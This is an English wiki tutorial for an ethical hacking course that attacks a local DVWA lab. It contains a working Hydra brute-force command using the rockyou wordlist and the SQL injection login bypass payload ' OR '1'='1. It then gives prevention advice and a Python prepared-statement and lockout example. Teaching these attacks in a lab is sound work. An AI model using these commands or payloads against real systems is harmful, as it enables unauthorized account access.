Hands-on: Password Cracking dan Authentication Bypass (en)

From OnnoWiki

Here is a complete explanation with examples using Kali Linux 2024.3 to attack DVWA (Damn Vulnerable Web Application), with a focus on Password Cracking and Authentication Bypass, for ethical hacking course purposes.

Setup DVWA on Ubuntu Server

  • Before starting the exploitation, make sure DVWA is installed and running on Ubuntu Server. Here are the steps for setup:
sudo apt update
sudo apt install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php
sudo git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
cd /var/www/html/dvwa
sudo cp config/config.inc.php.dist config/config.inc.php
sudo service apache2 start
sudo service mysql start
  • After that, create a database for DVWA:
mysql -u root -p
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
  • Finally, open a browser and access DVWA via `http://localhost/dvwa`, then login with the username `admin` and password `password`. Make sure the DVWA security level is set to Low in the DVWA Security menu.

Password Cracking (Brute Force)

To crack the password on DVWA, we will use the brute force technique with the help of Hydra, which is a tool in Kali Linux.

Step 1: Identify the Login Form

  • Open the DVWA login page in a browser and look at the relevant HTML elements. For example, the login form might have the following parameters:
    • username: input username
    • password: input password
    • Login: button to submit a request

Step 2: Running Hydra for Brute Force

  • In this example, we will use a wordlist to try to guess the password. Hydra supports several protocols and request formats, including HTTP POST login forms.
  • Here is an example of a Hydra command for brute force:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
  • Where:
    • `-l admin`: tries the single username `admin`.
    • `-P /usr/share/wordlists/rockyou.txt`: wordlist file whose entries are tried as passwords.
    • `http-post-form`: the Hydra module for HTTP POST login forms.
    • `/dvwa/login.php`: path to the login form.
    • `username=^USER^&password=^PASS^&Login=Login`: POST parameters of the login form; Hydra substitutes each username and password into `^USER^` and `^PASS^`.
    • `Login failed`: string in the response that indicates a failed login; Hydra treats any response that does not contain it as a success.
  • If the password is found, Hydra will display the output with the correct password.

Example Output:

[80][http-post-form] host: 127.0.0.1 login: admin password: 123456

Authentication Bypass (SQL Injection)

SQL Injection is a technique that exploits weaknesses in SQL queries used by web applications. In the case of authentication bypass, we can inject SQL queries into the login form to access an account without knowing the password.

Step 1: Identifying SQL Injection in the Login Form

  • Go to the DVWA login page and enter the following payload in the username and password fields:
Username: `' OR '1'='1`
Password: `' OR '1'='1`
  • This payload exploits the weakness in the SQL query in the backend by adding the condition `'1'='1`, which is always true, so that authentication bypass occurs.

Step 2: Exploitation Process

  • After entering the payload above, click Login. If the application is vulnerable to SQL Injection, you will successfully log in as an administrator or another user without entering the correct password.

SQL Injection Explanation

  • In the backend, a typical login query looks like:
SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
  • With the payload `' OR '1'='1` in both fields, the query becomes:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';
  • Since `'1'='1'` is always true, the WHERE clause matches every row, so the query returns all records from the `users` table and the application treats the login as successful.

Preventive Steps

To prevent password cracking and SQL injection attacks, the steps that can be taken are:

  • Using strong passwords and implementing rate-limiting on logins to prevent brute force.
  • Using prepared statements (parameterized queries) to avoid SQL Injection.
  • Filtering user input and validating it.
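As an added example (not from the original page or from DVWA's own code), the concatenated login query and its prepared-statement counterpart side by side in Python with SQLite, plus a per-username failed-attempt limit for the brute-force case; the table contents, the lockout threshold of 5 and the function names are assumptions:

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for DVWA's users table (not DVWA's real schema;
    # passwords are kept in plaintext here only to keep the example short).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "password"), ("gordonb", "abc123")])
    return con

def login_vulnerable(con, username, password):
    # The concatenated query from the explanation above: user input becomes SQL text,
    # so the payload ' OR '1'='1 turns the WHERE clause into one that matches every row.
    sql = ("SELECT user FROM users WHERE user = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(sql)]

def login_prepared(con, username, password):
    # Hardened form: ? placeholders bind the input as data, never as SQL syntax,
    # so the same payload is compared literally against the stored values.
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]

def login_guarded(con, username, password, failures, max_failures=5):
    # Brute-force mitigation: count failed attempts per username in `failures`
    # (assumed threshold of 5) and refuse further attempts once it is reached,
    # so a wordlist run like the Hydra example above is cut off early.
    if failures.get(username, 0) >= max_failures:
        return None  # locked out; do not reveal whether the password was right
    result = login_prepared(con, username, password)
    failures[username] = 0 if result else failures.get(username, 0) + 1
    return result

def demo():
    con = make_db()
    payload = "' OR '1'='1"
    return {
        "vulnerable_valid": login_vulnerable(con, "admin", "password"),
        "vulnerable_payload": login_vulnerable(con, payload, payload),
        "prepared_valid": login_prepared(con, "admin", "password"),
        "prepared_payload": login_prepared(con, payload, payload),
    }

if __name__ == "__main__":
    for name, matched in demo().items():
        print(name, matched)
```

The vulnerable query returns every user for the payload while the prepared one returns nothing, and `login_guarded` returns `None` once the attempt limit is hit regardless of the password supplied.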

By using these techniques in ethical hacking class, we can learn how attackers can exploit security holes and how to protect the system from such attacks.

Interesting Links